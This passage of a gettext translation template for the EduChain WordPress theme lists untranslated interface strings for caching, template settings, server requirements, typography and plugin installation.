framework-customizations/theme/options/speed-optimize.php:153 msgid "Stylesheet Minification" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:154 msgid "Enable / Disable stylesheet minification" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:166 #: framework-customizations/theme/options/speed-optimize.php:167 msgid "Delete Minify Files" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:168 msgid "" "Minify files are stored on your server as .js and .css files. If you need to " "delete them, use the button below." msgstr "" #: framework-customizations/theme/options/speed-optimize.php:173 msgid "Advanced Settings" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:178 #: framework-customizations/theme/options/speed-optimize.php:348 msgid "Cache Time" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:179 msgid "Cache Time (seconds)" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:185 #: framework-customizations/theme/options/speed-optimize.php:186 msgid "JavaScript Placement" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:188 msgid "Both header and footer" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:189 msgid "All in header" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:190 msgid "All in footer" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:196 msgid "Using Async Tag" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:197 msgid "Using async tag in javascript tag" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:212 msgid "Browser Cache" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:222 msgid "Gzip Compression" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:223 msgid "Enable / Disable gzip compression" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:241 msgid "Leverage Browser Caching" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:257 msgid "HTML Expire Time" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:262 msgid "CSS JS Expire Time" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:267 msgid "Other Expire Time" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:277 msgid "Page Cache" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:289 msgid "Page Cache Status" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:290 msgid "Enable / Disable page cache" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:303 msgid "Delete Cached Pages" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:304 msgid "" "Cached pages are stored on your server as html and PHP files. If you need to " "delete them, use the button below." msgstr "" #: framework-customizations/theme/options/speed-optimize.php:307 msgid "Compress Content" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:310 msgid "" "Compress pages so they are served more quickly to visitors (Recommended)." msgstr "" #: framework-customizations/theme/options/speed-optimize.php:311 msgid "" "Compression is disabled by default because some hosts have problems with " "compressed files. Switching it on and off clears the cache." msgstr "" #: framework-customizations/theme/options/speed-optimize.php:315 msgid "Cache Content" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:318 msgid "" "Unauthenticated users may view a cached version of the last authenticated " "users view of a given page. Disabling this option is not recommended." msgstr "" #: framework-customizations/theme/options/speed-optimize.php:319 msgid "Do not cache pages for logged in users" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:331 msgid "Cache Preload" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:332 msgid "Automatically prime the page cache." msgstr "" #: framework-customizations/theme/options/speed-optimize.php:349 msgid "" "How long should cached pages remain fresh? Set to 0 to disable garbage " "collection. A good starting point is 3600 seconds." msgstr "" #: framework-customizations/theme/options/speed-optimize.php:355 msgid "Scheduler Clear Cache" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:356 msgid "" "Check for stale cached files at this time (UTC) or starting at this time " "every interval below." msgstr "" #: framework-customizations/theme/options/speed-optimize.php:367 msgid "Scheduler Clear Cache Interval" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:376 msgid "Cache Update Configuration" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:380 msgid "When Update Post" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:383 msgid "Auto update when edit, delete, publish, trash post." msgstr "" #: framework-customizations/theme/options/speed-optimize.php:390 msgid "Update edited posts" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:391 msgid "Update front page and posts page" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:392 msgid "Update category page" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:396 msgid "When Post Comment" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:399 msgid "Auto refresh cache when post, edit, approve user comment." msgstr "" #: framework-customizations/theme/options/speed-optimize.php:403 msgid "When Switch Theme" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:406 msgid "Auto refresh all cache. Include all cache content you selected" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:410 msgid "When Update Nav Menu" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:413 msgid "Auto clear all cache. Where used this nav menu" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:417 msgid "When Update User Profile" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:420 msgid "Update cache when user update profile." msgstr "" #: framework-customizations/theme/options/speed-optimize.php:422 msgid "Update page author" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:423 msgid "Update posts belong to this user" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:429 msgid "Reject Cache Configuration" msgstr "" #: framework-customizations/theme/options/taxonomies/cat_course.php:9 msgid "Choose if this category is feature category." msgstr "" #: framework-customizations/theme/options/taxonomies/cat_course.php:10 #: includes/hooks.php:432 msgid "Is Feature?" msgstr "" #: framework-customizations/theme/options/taxonomies/cat_course.php:16 #: framework-customizations/theme/options/taxonomies/slz-faq-cat.php:24 msgid "Choose a icon for FAQ category." msgstr "" #: framework-customizations/theme/options/taxonomies/cat_course.php:20 #: includes/hooks.php:440 msgid "Attach Image" msgstr "" #: framework-customizations/theme/options/taxonomies/cat_course.php:21 msgid "Upload image for category." msgstr "" #: framework-customizations/theme/options/taxonomies/category.php:24 #: framework-customizations/theme/options/template-settings.php:66 #: framework-customizations/theme/options/template-settings.php:91 #: framework-customizations/theme/options/template-settings.php:116 #: framework-customizations/theme/options/template-settings.php:141 #: framework-customizations/theme/options/template-settings.php:166 #: framework-customizations/theme/options/template-settings.php:191 msgid "Article Style" msgstr "" #: framework-customizations/theme/options/template-settings.php:39 msgid "Page Settings" msgstr "" #: framework-customizations/theme/options/template-settings.php:62 msgid "Blog Settings" msgstr "" #: framework-customizations/theme/options/template-settings.php:87 msgid "Search Settings" msgstr "" #: framework-customizations/theme/options/template-settings.php:112 msgid "Author Settings" msgstr "" #: framework-customizations/theme/options/template-settings.php:137 msgid "Category Settings" msgstr "" #: framework-customizations/theme/options/template-settings.php:162 msgid "Archive Settings" msgstr "" #: framework-customizations/theme/options/template-settings.php:187 msgid "Tag Settings" msgstr "" #: framework-customizations/theme/options/template-settings.php:235 msgid "Portfolio Archive" msgstr "" #: framework-customizations/theme/options/template-settings.php:240 msgid "Set how to display sidebar in portfolio archive pages." msgstr "" #: framework-customizations/theme/options/template-settings.php:270 #: framework-customizations/theme/options/template-settings.php:340 #: framework-customizations/theme/options/template-settings.php:410 #: framework-customizations/theme/options/template-settings.php:480 #: framework-customizations/theme/options/template-settings.php:544 msgid "Add custom title for archive" msgstr "" #: framework-customizations/theme/options/template-settings.php:277 #: framework-customizations/theme/options/template-settings.php:347 #: framework-customizations/theme/options/template-settings.php:417 #: framework-customizations/theme/options/template-settings.php:487 #: framework-customizations/theme/options/template-settings.php:551 msgid "Post Per Page" msgstr "" #: framework-customizations/theme/options/template-settings.php:278 #: framework-customizations/theme/options/template-settings.php:348 #: framework-customizations/theme/options/template-settings.php:418 #: framework-customizations/theme/options/template-settings.php:488 #: framework-customizations/theme/options/template-settings.php:552 msgid "Add limit posts per page. Set -1 or empty to show all." msgstr "" #: framework-customizations/theme/options/template-settings.php:283 msgid "Enter number of columns to display list of portfolio." msgstr "" #: framework-customizations/theme/options/template-settings.php:305 msgid "Team Archive" msgstr "" #: framework-customizations/theme/options/template-settings.php:310 msgid "Set how to display sidebar in team archive pages." msgstr "" #: framework-customizations/theme/options/template-settings.php:353 msgid "Enter number of columns to display list of teams." msgstr "" #: framework-customizations/theme/options/template-settings.php:371 msgid "Services" msgstr "" #: framework-customizations/theme/options/template-settings.php:375 msgid "Service Archive" msgstr "" #: framework-customizations/theme/options/template-settings.php:380 msgid "Set how to display sidebar in service archive pages." msgstr "" #: framework-customizations/theme/options/template-settings.php:423 msgid "Enter number of columns to display list of services." msgstr "" #: framework-customizations/theme/options/template-settings.php:445 msgid "Events Archive" msgstr "" #: framework-customizations/theme/options/template-settings.php:450 msgid "Set how to display sidebar in event archive pages." msgstr "" #: framework-customizations/theme/options/template-settings.php:509 msgid "FAQ Archive" msgstr "" #: framework-customizations/theme/options/template-settings.php:514 msgid "Set how to display sidebar in FAQ archive pages." msgstr "" #: framework-customizations/theme/options/template-settings.php:594 msgid "Template Settings" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:12 #: setup/class-educhain-setup.php:1083 msgid "The version of WordPress installed on your site." msgstr "" #: framework-customizations/theme/options/theme-requirements.php:12 msgid "" "We recommend you update WordPress to the latest version. The minimum " "required version for this theme is:" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:12 msgid "Do that right now" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:16 msgid "The version of WordPress installed on your site" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:30 msgid "" "Displays whether or not WordPress is in Debug Mode. This mode is used by " "developers to test the theme. We recommend you turn it off for an optimal " "user experience on your website." msgstr "" #: framework-customizations/theme/options/theme-requirements.php:30 #: framework-customizations/theme/options/theme-requirements.php:42 #: framework-customizations/theme/options/theme-requirements.php:67 #: framework-customizations/theme/options/theme-requirements.php:79 #: framework-customizations/theme/options/theme-requirements.php:89 #: framework-customizations/theme/options/theme-requirements.php:126 #: setup/class-educhain-setup.php:1097 msgid "Learn how to do it" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:34 msgid "Displays whether or not WordPress is in Debug Mode" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:42 #: setup/class-educhain-setup.php:1101 msgid "The maximum amount of memory (RAM) that your site can use at one time." msgstr "" #: framework-customizations/theme/options/theme-requirements.php:42 msgid "" "We recommend setting memory to at least <strong>256MB</strong>. Please " "define memory limit in <strong>wp-config.php</strong> file." msgstr "" #: framework-customizations/theme/options/theme-requirements.php:45 msgid "The maximum amount of memory (RAM) that your site can use at one time" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:52 #: setup/class-educhain-setup.php:1114 msgid "The version of PHP installed on your hosting server." msgstr "" #: framework-customizations/theme/options/theme-requirements.php:52 msgid "" "We recommend you update PHP to the latest version. The minimum required " "version for this theme is:" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:52 #: framework-customizations/theme/options/theme-requirements.php:115 #: framework-customizations/theme/options/theme-requirements.php:245 msgid "Contact your hosting provider, they can install it for you." msgstr "" #: framework-customizations/theme/options/theme-requirements.php:56 msgid "The version of PHP installed on your hosting server" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:60 msgid "No PHP Installed" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:67 #: setup/class-educhain-setup.php:1120 msgid "The largest file size that can be contained in one post." msgstr "" #: framework-customizations/theme/options/theme-requirements.php:67 msgid "We recommend setting the post maximum size to at least:" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:71 msgid "The largest file size that can be contained in one post" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:79 msgid "" "The amount of time (in seconds) that your site will spend on a single " "operation before timing out (to avoid server lockups)." msgstr "" #: framework-customizations/theme/options/theme-requirements.php:79 msgid "We recommend setting the maximum execution time to at least" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:81 #: setup/class-educhain-setup.php:1126 msgid "" "The amount of time (in seconds) that your site will spend on a single " "operation before timing out (to avoid server lockups)" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:89 #: framework-customizations/theme/options/theme-requirements.php:92 #: setup/class-educhain-setup.php:1132 msgid "" "The maximum number of variables your server can use for a single function to " "avoid overloads." msgstr "" #: framework-customizations/theme/options/theme-requirements.php:89 msgid "Please increase the maximum input variables limit to:" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:99 msgid "" "Suhosin is an advanced protection system for PHP installations and may need " "to be configured to increase its data submission limits" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:103 #, php-format msgid "" "%s - Recommended Value is: %s. <a href=\"%s\" target=\"_blank\">Increasing " "max input vars limit.</a>" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:108 #: setup/class-educhain-setup.php:1138 msgid "Suhosin is an advanced protection system for PHP installations." msgstr "" #: framework-customizations/theme/options/theme-requirements.php:115 #: setup/class-educhain-setup.php:1150 msgid "The version of MySQL installed on your hosting server." msgstr "" #: framework-customizations/theme/options/theme-requirements.php:115 msgid "" "We recommend you update MySQL to the latest version. The minimum required " "version for this theme is:" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:119 msgid "The version of MySQL installed on your hosting server" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:126 #: setup/class-educhain-setup.php:1156 msgid "" "The largest file size that can be uploaded to your WordPress installation." msgstr "" #: framework-customizations/theme/options/theme-requirements.php:126 msgid "We recommend setting the maximum upload file size to at least:" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:136 msgid "" "Payment gateways can use cURL to communicate with remote servers to " "authorize payments, other plugins may also use it when communicating with " "remote services" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:140 msgid "" "Payment gateways can use cURL to communicate with remote servers to " "authorize payments, other plugins may also use it when communicating with " "remote services. Your server does not have <strong>fsockopen</strong> or " "<strong>cURL</strong> enabled thus PayPal IPN and other scripts which " "communicate with other servers will not work. Contact your hosting provider, " "they can install it for you." msgstr "" #: framework-customizations/theme/options/theme-requirements.php:145 msgid "Requirements" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:149 #: setup/class-educhain-setup.php:1070 msgid "WordPress Environment" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:154 #: setup/class-educhain-setup.php:1072 msgid "Home URL" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:155 msgid "The URL of your site's homepage" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:161 #: setup/class-educhain-setup.php:1077 msgid "Site URL" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:162 msgid "The root URL of your site" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:168 #: setup/class-educhain-setup.php:1082 msgid "WP Version" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:175 #: setup/class-educhain-setup.php:1088 msgid "WP Multisite" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:177 msgid "Whether or not you have WordPress Multisite enabled" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:182 #: setup/class-educhain-setup.php:1094 msgid "WP Debug Mode" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:189 #: setup/class-educhain-setup.php:1100 msgid "WP Memory Limit" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:197 #: setup/class-educhain-setup.php:1106 msgid "Server Environment" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:202 #: setup/class-educhain-setup.php:1108 msgid "Server Info" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:203 #: setup/class-educhain-setup.php:1109 msgid "Information about the web server that is currently hosting your site" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:209 #: setup/class-educhain-setup.php:1113 msgid "PHP Version" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:216 #: setup/class-educhain-setup.php:1119 msgid "PHP Post Max Size" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:223 #: setup/class-educhain-setup.php:1125 msgid "PHP Time Limit" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:230 #: setup/class-educhain-setup.php:1131 msgid "PHP Max Input Vars" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:237 #: setup/class-educhain-setup.php:1137 msgid "SUHOSIN Installed" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:244 msgid "ZipArchive" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:245 msgid "" "ZipArchive is required for importing demos. They are used to import and " "export zip files specifically for sliders" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:245 msgid "" "ZipArchive is required for importing demos. They are used to import and " "export zip files specifically for sliders." msgstr "" #: framework-customizations/theme/options/theme-requirements.php:251 #: setup/class-educhain-setup.php:1149 msgid "MySQL Version" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:258 #: setup/class-educhain-setup.php:1155 msgid "Max Upload Size" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:265 #: setup/class-educhain-setup.php:1161 msgid "fsockopen/cURL" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:274 #: setup/steps/check-requirement.php:35 msgid "Meets minimum requirements" msgstr "" #: framework-customizations/theme/options/theme-requirements.php:274 #: setup/steps/check-requirement.php:39 msgid "We have some improvements to suggest" msgstr "" #: framework-customizations/theme/options/typography.php:17 msgid "Styling Settings" msgstr "" #: framework-customizations/theme/options/typography.php:46 msgid "Link Settings" msgstr "" #: framework-customizations/theme/options/typography.php:57 msgid "Custom Link Colors" msgstr "" #: framework-customizations/theme/options/typography.php:71 msgid "Regular Color" msgstr "" #: framework-customizations/theme/options/typography.php:74 msgid "Select a color for link" msgstr "" #: framework-customizations/theme/options/typography.php:77 msgid "Hover Color" msgstr "" #: framework-customizations/theme/options/typography.php:78 msgid "Select a color for link hover" msgstr "" #: framework-customizations/theme/options/typography.php:83 msgid "Active Color" msgstr "" #: framework-customizations/theme/options/typography.php:84 msgid "Select a color for link active" msgstr "" #: framework-customizations/theme/options/typography.php:94 msgid "Typography" msgstr "" #: framework-customizations/theme/options/typography.php:116 msgid "Body Text" msgstr "" #: framework-customizations/theme/options/typography.php:117 msgid "Paragraph" msgstr "" #: framework-customizations/theme/options/typography.php:118 msgid "H1 Text" msgstr "" #: framework-customizations/theme/options/typography.php:119 msgid "H2 Text" msgstr "" #: framework-customizations/theme/options/typography.php:120 msgid "H3 Text" msgstr "" #: framework-customizations/theme/options/typography.php:121 msgid "H4 Text" msgstr "" #: framework-customizations/theme/options/typography.php:122 msgid "H5 Text" msgstr "" #: framework-customizations/theme/options/typography.php:123 msgid "H6 Text" msgstr "" #: framework-customizations/theme/options/typography.php:154 msgid "Typography Settings" msgstr "" #: framework-customizations/theme/options/typography.php:159 msgid "Styling / Typography" msgstr "" #: framework-customizations/theme/views/welcome-header.php:7 msgid "Welcome to" msgstr "" #: framework-customizations/theme/views/welcome-header.php:11 msgid "Please kindly DO NOT update Unyson Plugin separately!" msgstr "" #: framework-customizations/theme/views/welcome-header.php:12 msgid "" "We had customized its coding structure and create it a our own unique " "technique, if you update it, it will turn your site into \"Forbidden\" state " "and let your site DOWN." msgstr "" #: framework-customizations/theme/views/welcome-header.php:19 msgid "Plugins" msgstr "" #: framework-customizations/theme/views/welcome-header.php:24 msgid "Changes Log" msgstr "" #: framework-customizations/theme/views/welcome-header.php:29 msgid "Extension Manager" msgstr "" #: framework-customizations/theme/views/welcome-header.php:34 msgid "Theme Settings" msgstr "" #: framework-customizations/theme/views/welcome-header.php:40 msgid "Backup Data" msgstr "" #: framework-customizations/theme/views/welcome-header.php:47 msgid "Demo Install" msgstr "" #: framework-customizations/theme/views/welcome.php:28 msgid "" "These are the plugins we include with EduChain. Currently Solazu Unyson is " "the only required plugin that is needed to use EduChain. You can activate, " "deactivate or update the plugins from this tab." msgstr "" #: framework-customizations/theme/views/welcome.php:52 #: framework-customizations/theme/views/welcome.php:104 msgid "Active:" msgstr "" #: framework-customizations/theme/views/welcome.php:65 msgid "Update Available: Version" msgstr "" #: framework-customizations/theme/views/welcome.php:70 #: framework-customizations/theme/views/welcome.php:122 #, php-format msgid "Version %s | %s" msgstr "" #: framework-customizations/theme/views/welcome.php:75 #: includes/class-tgm-plugin-activation.php:2362 #: setup/steps/import-theme-setting.php:90 msgid "Required" msgstr "" #: framework-customizations/theme/views/welcome.php:81 #: setup/steps/active-plugin.php:113 msgid "Recommend Plugins" msgstr "" #: framework-customizations/theme/views/welcome.php:82 msgid "" "These are the plugins we tested with EduChain and they are compatible with " "together. If you want to use these plugins, you can activate, deactivate or " "update them in this tab." msgstr "" #: framework-customizations/theme/views/welcome.php:117 #, php-format msgid "Update Available: Version %s" msgstr "" #: framework-customizations/theme/views/welcome.php:126 msgid "Recommend" msgstr "" #: includes/class-breadcrumb.php:98 includes/helpers.php:659 #: includes/helpers.php:1705 msgid "Error 404" msgstr "" #: includes/class-breadcrumb.php:205 msgid "Posts tagged" msgstr "" #: includes/class-breadcrumb.php:275 msgid "Search results for" msgstr "" #: includes/class-breadcrumb.php:284 msgid "Page" msgstr "" #: includes/class-editor-format.php:28 msgid "Drop Cap" msgstr "" #: includes/class-editor-format.php:32 msgid "Regular" msgstr "" #: includes/class-editor-format.php:39 msgid "Italic" msgstr "" #: includes/class-editor-format.php:46 msgid "Bold" msgstr "" #: includes/class-editor-format.php:54 msgid "Blockquote" msgstr "" #: includes/class-editor-format.php:58 msgid "US - Florida" msgstr "" #: includes/class-editor-format.php:64 msgid "US - California" msgstr "" #: includes/class-editor-format.php:71 msgid "US - Georgia" msgstr "" #: includes/class-editor-format.php:78 msgid "US - New York" msgstr "" #: includes/class-editor-format.php:86 msgid "Bulleted List" msgstr "" #: includes/class-editor-format.php:90 msgid "1 Column" msgstr "" #: includes/class-editor-format.php:96 msgid "2 Columns" msgstr "" #: includes/class-editor-format.php:102 msgid "3 Columns" msgstr "" #: includes/class-editor-format.php:108 msgid "4 Columns" msgstr "" #: includes/class-tgm-plugin-activation.php:334 includes/hooks.php:121 msgid "Install Required Plugins" msgstr "" #: includes/class-tgm-plugin-activation.php:335 includes/hooks.php:122 msgid "Install Plugins" msgstr "" #: includes/class-tgm-plugin-activation.php:337 includes/hooks.php:123 #, php-format msgid "Installing Plugin: %s" msgstr "" #: includes/class-tgm-plugin-activation.php:339 #, php-format msgid "Updating Plugin: %s" msgstr "" #: includes/class-tgm-plugin-activation.php:340 includes/hooks.php:124 msgid "Something went wrong with the plugin API." msgstr "" #: includes/class-tgm-plugin-activation.php:343 #, php-format msgid "This theme requires the following plugin: %1$s." msgid_plural "This theme requires the following plugins: %1$s." msgstr[0] "" msgstr[1] "" #: includes/class-tgm-plugin-activation.php:349 #, php-format msgid "This theme recommends the following plugin: %1$s." msgid_plural "This theme recommends the following plugins: %1$s." msgstr[0] "" msgstr[1] "" #: includes/class-tgm-plugin-activation.php:355 includes/hooks.php:131 #, php-format msgid "" "The following plugin needs to be updated to its latest version to ensure " "maximum compatibility with this theme: %1$s." msgid_plural "" "The following plugins need to be updated to their latest version to ensure " "maximum compatibility with this theme: %1$s." msgstr[0] "" msgstr[1] "" #: includes/class-tgm-plugin-activation.php:361 #, php-format msgid "There is an update available for: %1$s." msgid_plural "There are updates available for the following plugins: %1$s." msgstr[0] "" msgstr[1] "" #: includes/class-tgm-plugin-activation.php:367 includes/hooks.php:128 #, php-format msgid "The following required plugin is currently inactive: %1$s." msgid_plural "The following required plugins are currently inactive: %1$s." msgstr[0] "" msgstr[1] "" #: includes/class-tgm-plugin-activation.php:373 includes/hooks.php:129 #, php-format msgid "The following recommended plugin is currently inactive: %1$s." msgid_plural "The following recommended plugins are currently inactive: %1$s." msgstr[0] "" msgstr[1] "" #: includes/class-tgm-plugin-activation.php:378 includes/hooks.php:133 msgid "Begin installing plugin" msgid_plural "Begin installing plugins" msgstr[0] "" msgstr[1] "" #: includes/class-tgm-plugin-activation.php:383 msgid "Begin updating plugin" msgid_plural "Begin updating plugins" msgstr[0] "" msgstr[1] "" #: includes/class-tgm-plugin-activation.php:388 msgid "Begin activating plugin" msgid_plural "Begin activating plugins" msgstr[0] "" msgstr[1] "" #: includes/class-tgm-plugin-activation.php:392 includes/hooks.php:135 msgid "Return to Required Plugins Installer" msgstr "" #: includes/class-tgm-plugin-activation.php:393 #: includes/class-tgm-plugin-activation.php:912 #: includes/class-tgm-plugin-activation.php:2622 #: includes/class-tgm-plugin-activation.php:3677 msgid "Return to the Dashboard" msgstr "" #: includes/class-tgm-plugin-activation.php:394 #: includes/class-tgm-plugin-activation.php:3253 includes/hooks.php:136 msgid "Plugin activated successfully." msgstr "" #: includes/class-tgm-plugin-activation.php:395 #: includes/class-tgm-plugin-activation.php:3046 msgid "The following plugin was activated successfully:" msgid_plural "The following plugins were activated successfully:" msgstr[0] "" msgstr[1] "" #: includes/class-tgm-plugin-activation.php:397 #, php-format msgid "No action taken. Plugin %1$s was already active." msgstr "" #: includes/class-tgm-plugin-activation.php:399 #, php-format msgid "" "Plugin not activated. A higher version of %s is needed for this theme. " "Please update the plugin." msgstr "" #: includes/class-tgm-plugin-activation.php:401 #, php-format msgid "All plugins installed and activated successfully. %1$s" msgstr "" #: includes/class-tgm-plugin-activation.php:402 msgid "Dismiss this notice" msgstr "" #: includes/class-tgm-plugin-activation.php:403 msgid "" "There are one or more required or recommended plugins to install, update or " "activate." msgstr "" #: includes/class-tgm-plugin-activation.php:404 msgid "Please contact the administrator of this site for help." msgstr "" #: includes/class-tgm-plugin-activation.php:608 msgid "Update Required" msgstr "" #: includes/class-tgm-plugin-activation.php:1023 msgid "" "The remote plugin package does not contain a folder with the desired slug " "and renaming did not work." msgstr "" #: includes/class-tgm-plugin-activation.php:1023 #: includes/class-tgm-plugin-activation.php:1026 msgid "" "Please contact the plugin provider and ask them to package their plugin " "according to the WordPress guidelines." msgstr "" #: includes/class-tgm-plugin-activation.php:1026 msgid "" "The remote plugin package consists of more than one file, but the files are " "not packaged in a folder." msgstr "" #: includes/class-tgm-plugin-activation.php:1210 #: includes/class-tgm-plugin-activation.php:3042 msgid "and" msgstr "" #: includes/class-tgm-plugin-activation.php:2071 #, php-format msgid "TGMPA v%s" msgstr "" #: includes/class-tgm-plugin-activation.php:2365 #: setup/steps/import-theme-setting.php:90 msgid "Recommended" msgstr "" #: includes/class-tgm-plugin-activation.php:2381 msgid "WordPress Repository" msgstr "" #: includes/class-tgm-plugin-activation.php:2384 msgid "External Source" msgstr "" #: includes/class-tgm-plugin-activation.php:2387 msgid "Pre-Packaged" msgstr "" #: includes/class-tgm-plugin-activation.php:2404 #: setup/steps/active-plugin.php:89 setup/steps/active-plugin.php:127 #: setup/steps/import-theme-setting.php:85 msgid "Not Installed" msgstr "" #: includes/class-tgm-plugin-activation.php:2408 msgid "Installed But Not Activated" msgstr "" #: includes/class-tgm-plugin-activation.php:2410 msgid "Active" msgstr "" #: includes/class-tgm-plugin-activation.php:2416 msgid "Required Update not Available" msgstr "" #: includes/class-tgm-plugin-activation.php:2419 msgid "Requires Update" msgstr "" #: includes/class-tgm-plugin-activation.php:2422 msgid "Update recommended" msgstr "" #: includes/class-tgm-plugin-activation.php:2477 #, php-format msgid "All <span class=\"count\">(%s)</span>" msgid_plural "All <span class=\"count\">(%s)</span>" msgstr[0] "" msgstr[1] "" #: includes/class-tgm-plugin-activation.php:2481 #, php-format msgid "To Install <span class=\"count\">(%s)</span>" msgid_plural "To Install <span class=\"count\">(%s)</span>" msgstr[0] "" msgstr[1] "" #: includes/class-tgm-plugin-activation.php:2485 #, php-format msgid "Update Available <span class=\"count\">(%s)</span>" msgid_plural "Update Available <span class=\"count\">(%s)</span>" msgstr[0] "" msgstr[1] "" #: includes/class-tgm-plugin-activation.php:2489 #, php-format msgid "To Activate <span class=\"count\">(%s)</span>" msgid_plural "To Activate <span class=\"count\">(%s)</span>" msgstr[0] "" msgstr[1] "" #: includes/class-tgm-plugin-activation.php:2579 msgid "Installed version:" msgstr "" #: includes/class-tgm-plugin-activation.php:2587 msgid "Minimum required version:" msgstr "" #: includes/class-tgm-plugin-activation.php:2599 msgid "Available version:" msgstr "" #: includes/class-tgm-plugin-activation.php:2622 msgid "No plugins to install, update or activate." msgstr "" #: includes/class-tgm-plugin-activation.php:2641 msgid "Plugin" msgstr "" #: includes/class-tgm-plugin-activation.php:2642 msgid "Source" msgstr "" #: includes/class-tgm-plugin-activation.php:2647 msgid "Version" msgstr "" #: includes/class-tgm-plugin-activation.php:2648 #: setup/steps/import-theme-setting.php:68 msgid "Status" msgstr "" #: includes/class-tgm-plugin-activation.php:2778 msgid "Upgrade message from the plugin author:" msgstr "" #: includes/class-tgm-plugin-activation.php:2851 msgid "No plugins were selected to be installed. No action taken." msgstr "" #: includes/class-tgm-plugin-activation.php:2853 msgid "No plugins were selected to be updated. No action taken." msgstr "" #: includes/class-tgm-plugin-activation.php:2894 msgid "No plugins are available to be installed at this time." msgstr "" #: includes/class-tgm-plugin-activation.php:2896 msgid "No plugins are available to be updated at this time." msgstr "" #: includes/class-tgm-plugin-activation.php:3002 msgid "No plugins were selected to be activated. No action taken." msgstr "" #: includes/class-tgm-plugin-activation.php:3028 msgid "No plugins are available to be activated at this time." msgstr "" #: includes/class-tgm-plugin-activation.php:3252 msgid "Plugin activation failed." msgstr "" #: includes/class-tgm-plugin-activation.php:3592 #, php-format msgid "Updating Plugin %1$s (%2$d/%3$d)" msgstr "" #: includes/class-tgm-plugin-activation.php:3595 #, php-format msgid "An error occurred while installing %1$s: <strong>%2$s</strong>." msgstr "" #: includes/class-tgm-plugin-activation.php:3597 #, php-format msgid "The installation of %1$s failed." msgstr "" #: includes/class-tgm-plugin-activation.php:3601 msgid "" "The installation and activation process is starting. This process may take a " "while on some hosts, so please be patient." msgstr "" #: includes/class-tgm-plugin-activation.php:3603 #, php-format msgid "%1$s installed and activated successfully." msgstr "" #: includes/class-tgm-plugin-activation.php:3603 #: includes/class-tgm-plugin-activation.php:3611 msgid "Show 